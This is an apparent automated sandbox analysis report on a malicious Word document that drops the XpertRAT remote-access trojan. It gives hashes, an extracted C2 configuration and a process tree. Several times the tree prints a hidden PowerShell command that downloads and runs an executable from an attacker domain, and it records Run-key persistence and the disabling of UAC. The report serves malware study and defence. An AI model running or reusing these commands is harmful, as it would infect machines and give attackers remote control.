Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-en -
submitted
16-09-2021 15:12
Static task
static1
Behavioral task
behavioral1
Sample
PO sept2116 FRP-SHM.doc
Resource
win7-en
Behavioral task
behavioral2
Sample
PO sept2116 FRP-SHM.doc
Resource
win10v20210408
General
-
Target
PO sept2116 FRP-SHM.doc
-
Size
341KB
-
MD5
dc9a33a35b76796e46c64dd1b464b12f
-
SHA1
a235e802a62465a8985af532730d89e60f17f982
-
SHA256
39f9e4df37b9d4b3e5ad5df753c9e8c3617472f3cfa778e43ddd822544455788
-
SHA512
f07653cea29668a76197ae59c5ca7e918517d068a5050df4a5bd1d3261a1451df7d164c197151a9c0dbd61b697c66054b9383d7b92a3c73925ad1bfaacc07f94
Malware Config
Extracted
httP://esetnode32-antiviru.ydns.eu/EXCEL.exe
Extracted
xpertrat
3.0.10
Test
kapasky-antivirus.firewall-gateway.net:4000
L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exepowershell.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1212 1316 powershell.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1636 1316 powershell.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1904 1316 powershell.exe WINWORD.EXE -
XpertRAT Core Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2020-128-0x0000000000400000-0x0000000000443000-memory.dmp xpertrat behavioral1/memory/2020-129-0x0000000000401364-mapping.dmp xpertrat -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" iexplore.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1212 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
EXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exepid process 684 EXCEL.exe 1748 EXCEL.exe 1796 EXCEL.exe 1644 EXCEL.exe 1632 EXCEL.exe -
Loads dropped DLL 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exepid process 1212 powershell.exe 1636 powershell.exe 1904 powershell.exe 684 EXCEL.exe 1796 EXCEL.exe 1796 EXCEL.exe -
Processes:
EXCEL.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" EXCEL.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" iexplore.exe -
Processes:
EXCEL.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
EXCEL.exeEXCEL.exeEXCEL.exedescription pid process target process PID 684 set thread context of 1632 684 EXCEL.exe EXCEL.exe PID 1796 set thread context of 324 1796 EXCEL.exe EXCEL.exe PID 1632 set thread context of 2020 1632 EXCEL.exe iexplore.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1316 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exepid process 1212 powershell.exe 1212 powershell.exe 1212 powershell.exe 1904 powershell.exe 1636 powershell.exe 1636 powershell.exe 1636 powershell.exe 1904 powershell.exe 1904 powershell.exe 296 powershell.exe 1980 powershell.exe 684 EXCEL.exe 684 EXCEL.exe 1796 EXCEL.exe 1796 EXCEL.exe 1796 EXCEL.exe 1796 EXCEL.exe 1796 EXCEL.exe 1796 EXCEL.exe 1632 EXCEL.exe 1632 EXCEL.exe 1632 EXCEL.exe 1632 EXCEL.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exepowershell.exepowershell.exeiexplore.exedescription pid process Token: SeDebugPrivilege 1212 powershell.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 1636 powershell.exe Token: SeDebugPrivilege 1748 EXCEL.exe Token: SeDebugPrivilege 1796 EXCEL.exe Token: SeDebugPrivilege 684 EXCEL.exe Token: SeDebugPrivilege 296 powershell.exe Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 2020 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
WINWORD.EXEEXCEL.exeiexplore.exepid process 1316 WINWORD.EXE 1316 WINWORD.EXE 1316 WINWORD.EXE 1316 WINWORD.EXE 1632 EXCEL.exe 2020 iexplore.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WINWORD.EXEpowershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exedescription pid process target process PID 1316 wrote to memory of 1212 1316 WINWORD.EXE powershell.exe PID 1316 wrote to memory of 1212 1316 WINWORD.EXE powershell.exe PID 1316 wrote to memory of 1212 1316 WINWORD.EXE powershell.exe PID 1316 wrote to memory of 1212 1316 WINWORD.EXE powershell.exe PID 1212 wrote to memory of 684 1212 powershell.exe EXCEL.exe PID 1212 wrote to memory of 684 1212 powershell.exe EXCEL.exe PID 1212 wrote to memory of 684 1212 powershell.exe EXCEL.exe PID 1212 wrote to memory of 684 1212 powershell.exe EXCEL.exe PID 1212 wrote to memory of 684 1212 powershell.exe EXCEL.exe PID 1212 wrote to memory of 684 1212 powershell.exe EXCEL.exe PID 1212 wrote to memory of 684 1212 powershell.exe EXCEL.exe PID 1316 wrote to memory of 1636 1316 WINWORD.EXE powershell.exe PID 1316 wrote to memory of 1636 1316 WINWORD.EXE powershell.exe PID 1316 wrote to memory of 1636 1316 WINWORD.EXE powershell.exe PID 1316 wrote to memory of 1636 1316 WINWORD.EXE powershell.exe PID 1316 wrote to memory of 1904 1316 WINWORD.EXE powershell.exe PID 1316 wrote to memory of 1904 1316 WINWORD.EXE powershell.exe PID 1316 wrote to memory of 1904 1316 WINWORD.EXE powershell.exe PID 1316 wrote to memory of 1904 1316 WINWORD.EXE powershell.exe PID 1636 wrote to memory of 1748 1636 powershell.exe EXCEL.exe PID 1636 wrote to memory of 1748 1636 powershell.exe EXCEL.exe PID 1636 wrote to memory of 1748 1636 powershell.exe EXCEL.exe PID 1636 wrote to memory of 1748 1636 powershell.exe EXCEL.exe PID 1636 wrote to memory of 1748 1636 powershell.exe EXCEL.exe PID 1636 wrote to memory of 1748 1636 powershell.exe EXCEL.exe PID 1636 wrote to memory of 1748 1636 powershell.exe EXCEL.exe PID 1904 wrote to memory of 1796 1904 powershell.exe EXCEL.exe PID 1904 wrote to memory of 1796 1904 powershell.exe EXCEL.exe PID 1904 wrote to memory of 1796 1904 powershell.exe EXCEL.exe PID 1904 wrote to memory of 1796 1904 powershell.exe EXCEL.exe PID 1904 wrote to memory of 1796 1904 powershell.exe EXCEL.exe PID 1904 wrote to memory of 1796 1904 powershell.exe EXCEL.exe PID 1904 wrote to memory of 1796 1904 powershell.exe EXCEL.exe PID 1796 wrote to memory of 296 1796 EXCEL.exe powershell.exe PID 1796 wrote to memory of 296 1796 EXCEL.exe powershell.exe PID 1796 wrote to memory of 296 1796 EXCEL.exe powershell.exe PID 1796 wrote to memory of 296 1796 EXCEL.exe powershell.exe PID 1748 wrote to memory of 1612 1748 EXCEL.exe powershell.exe PID 1748 wrote to memory of 1612 1748 EXCEL.exe powershell.exe PID 1748 wrote to memory of 1612 1748 EXCEL.exe powershell.exe PID 1748 wrote to memory of 1612 1748 EXCEL.exe powershell.exe PID 684 wrote to memory of 1980 684 EXCEL.exe powershell.exe PID 684 wrote to memory of 1980 684 EXCEL.exe powershell.exe PID 684 wrote to memory of 1980 684 EXCEL.exe powershell.exe PID 684 wrote to memory of 1980 684 EXCEL.exe powershell.exe PID 1316 wrote to memory of 2016 1316 WINWORD.EXE splwow64.exe PID 1316 wrote to memory of 2016 1316 WINWORD.EXE splwow64.exe PID 1316 wrote to memory of 2016 1316 WINWORD.EXE splwow64.exe PID 1316 wrote to memory of 2016 1316 WINWORD.EXE splwow64.exe PID 1796 wrote to memory of 1644 1796 EXCEL.exe EXCEL.exe PID 1796 wrote to memory of 1644 1796 EXCEL.exe EXCEL.exe PID 1796 wrote to memory of 1644 1796 EXCEL.exe EXCEL.exe PID 1796 wrote to memory of 1644 1796 EXCEL.exe EXCEL.exe PID 1796 wrote to memory of 1644 1796 EXCEL.exe EXCEL.exe PID 1796 wrote to memory of 1644 1796 EXCEL.exe EXCEL.exe PID 1796 wrote to memory of 1644 1796 EXCEL.exe EXCEL.exe PID 684 wrote to memory of 1632 684 EXCEL.exe EXCEL.exe PID 684 wrote to memory of 1632 684 EXCEL.exe EXCEL.exe PID 684 wrote to memory of 1632 684 EXCEL.exe EXCEL.exe PID 684 wrote to memory of 1632 684 EXCEL.exe EXCEL.exe PID 684 wrote to memory of 1632 684 EXCEL.exe EXCEL.exe PID 684 wrote to memory of 1632 684 EXCEL.exe EXCEL.exe PID 684 wrote to memory of 1632 684 EXCEL.exe EXCEL.exe PID 684 wrote to memory of 1632 684 EXCEL.exe EXCEL.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
EXCEL.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO sept2116 FRP-SHM.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EXCEL.exe"C:\Users\Admin\AppData\Roaming\EXCEL.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\EXCEL.exeC:\Users\Admin\AppData\Local\Temp\EXCEL.exe4⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
-
C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Admin\AppData\Local\Temp\EXCEL.exe5⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\notepad.exenotepad.exe6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EXCEL.exe"C:\Users\Admin\AppData\Roaming\EXCEL.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EXCEL.exe"C:\Users\Admin\AppData\Roaming\EXCEL.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\EXCEL.exeC:\Users\Admin\AppData\Local\Temp\EXCEL.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\EXCEL.exeC:\Users\Admin\AppData\Local\Temp\EXCEL.exe4⤵
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
C:\Users\Admin\AppData\Local\Temp\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
C:\Users\Admin\AppData\Local\Temp\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
C:\Users\Admin\AppData\Local\Temp\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
C:\Users\Admin\AppData\Roaming\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
C:\Users\Admin\AppData\Roaming\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
C:\Users\Admin\AppData\Roaming\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
C:\Users\Admin\AppData\Roaming\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
c76ec9954800eb464c7c885dd79bd4c5
SHA15668d6f08b21f614b090372be8e0e82fb4e2a020
SHA25671e0c865d9517d95846934eb8949a3fee2c5fbd867d165e21718ee6aefa8ebdc
SHA512fba98bc4b3df8e4022f8a5f8397c1b97a0bc34cf2ec6e5afb03a8a70e0f2c8e36adaad61cc91ffe6fe5237b97d07e93652988e4e6110b8aa4c664fd9af85f2cc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
c76ec9954800eb464c7c885dd79bd4c5
SHA15668d6f08b21f614b090372be8e0e82fb4e2a020
SHA25671e0c865d9517d95846934eb8949a3fee2c5fbd867d165e21718ee6aefa8ebdc
SHA512fba98bc4b3df8e4022f8a5f8397c1b97a0bc34cf2ec6e5afb03a8a70e0f2c8e36adaad61cc91ffe6fe5237b97d07e93652988e4e6110b8aa4c664fd9af85f2cc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
c76ec9954800eb464c7c885dd79bd4c5
SHA15668d6f08b21f614b090372be8e0e82fb4e2a020
SHA25671e0c865d9517d95846934eb8949a3fee2c5fbd867d165e21718ee6aefa8ebdc
SHA512fba98bc4b3df8e4022f8a5f8397c1b97a0bc34cf2ec6e5afb03a8a70e0f2c8e36adaad61cc91ffe6fe5237b97d07e93652988e4e6110b8aa4c664fd9af85f2cc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
c76ec9954800eb464c7c885dd79bd4c5
SHA15668d6f08b21f614b090372be8e0e82fb4e2a020
SHA25671e0c865d9517d95846934eb8949a3fee2c5fbd867d165e21718ee6aefa8ebdc
SHA512fba98bc4b3df8e4022f8a5f8397c1b97a0bc34cf2ec6e5afb03a8a70e0f2c8e36adaad61cc91ffe6fe5237b97d07e93652988e4e6110b8aa4c664fd9af85f2cc
-
\Users\Admin\AppData\Local\Temp\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
\Users\Admin\AppData\Local\Temp\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
\Users\Admin\AppData\Local\Temp\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
\Users\Admin\AppData\Roaming\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
\Users\Admin\AppData\Roaming\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
\Users\Admin\AppData\Roaming\EXCEL.exeMD5
230811e776cb540cbc2a06fe4adaf339
SHA1d679baca39696f690213099869bf6efc1cc8c560
SHA25699cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
SHA512c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
-
memory/296-104-0x0000000002470000-0x00000000030BA000-memory.dmpFilesize
12.3MB
-
memory/296-106-0x0000000002470000-0x00000000030BA000-memory.dmpFilesize
12.3MB
-
memory/296-96-0x0000000000000000-mapping.dmp
-
memory/296-108-0x0000000002470000-0x00000000030BA000-memory.dmpFilesize
12.3MB
-
memory/296-110-0x0000000004D50000-0x0000000005022000-memory.dmpFilesize
2.8MB
-
memory/684-66-0x0000000000210000-0x0000000000211000-memory.dmpFilesize
4KB
-
memory/684-63-0x0000000000000000-mapping.dmp
-
memory/684-74-0x0000000004C30000-0x0000000004C31000-memory.dmpFilesize
4KB
-
memory/684-115-0x00000000044A0000-0x00000000044D0000-memory.dmpFilesize
192KB
-
memory/1212-56-0x0000000000000000-mapping.dmp
-
memory/1212-59-0x00000000023E1000-0x00000000023E2000-memory.dmpFilesize
4KB
-
memory/1212-61-0x0000000004B40000-0x0000000005191000-memory.dmpFilesize
6.3MB
-
memory/1212-60-0x00000000023E2000-0x00000000023E4000-memory.dmpFilesize
8KB
-
memory/1212-58-0x00000000023E0000-0x00000000023E1000-memory.dmpFilesize
4KB
-
memory/1316-53-0x00000000700C1000-0x00000000700C3000-memory.dmpFilesize
8KB
-
memory/1316-55-0x0000000075911000-0x0000000075913000-memory.dmpFilesize
8KB
-
memory/1316-52-0x0000000072641000-0x0000000072644000-memory.dmpFilesize
12KB
-
memory/1316-54-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1612-97-0x0000000000000000-mapping.dmp
-
memory/1632-121-0x00000000004010B8-mapping.dmp
-
memory/1632-120-0x0000000000400000-0x000000000042C000-memory.dmpFilesize
176KB
-
memory/1636-79-0x0000000004C40000-0x0000000004F12000-memory.dmpFilesize
2.8MB
-
memory/1636-76-0x0000000002310000-0x0000000002F5A000-memory.dmpFilesize
12.3MB
-
memory/1636-75-0x0000000002310000-0x0000000002F5A000-memory.dmpFilesize
12.3MB
-
memory/1636-68-0x0000000000000000-mapping.dmp
-
memory/1636-78-0x0000000002310000-0x0000000002F5A000-memory.dmpFilesize
12.3MB
-
memory/1748-91-0x0000000004720000-0x0000000004721000-memory.dmpFilesize
4KB
-
memory/1748-93-0x0000000002290000-0x00000000022D8000-memory.dmpFilesize
288KB
-
memory/1748-82-0x0000000000000000-mapping.dmp
-
memory/1796-84-0x0000000000000000-mapping.dmp
-
memory/1796-92-0x0000000004E60000-0x0000000004E61000-memory.dmpFilesize
4KB
-
memory/1904-77-0x0000000002370000-0x0000000002FBA000-memory.dmpFilesize
12.3MB
-
memory/1904-69-0x0000000000000000-mapping.dmp
-
memory/1904-80-0x0000000004CA0000-0x0000000004F72000-memory.dmpFilesize
2.8MB
-
memory/1980-109-0x0000000002530000-0x000000000317A000-memory.dmpFilesize
12.3MB
-
memory/1980-98-0x0000000000000000-mapping.dmp
-
memory/1980-107-0x0000000002530000-0x000000000317A000-memory.dmpFilesize
12.3MB
-
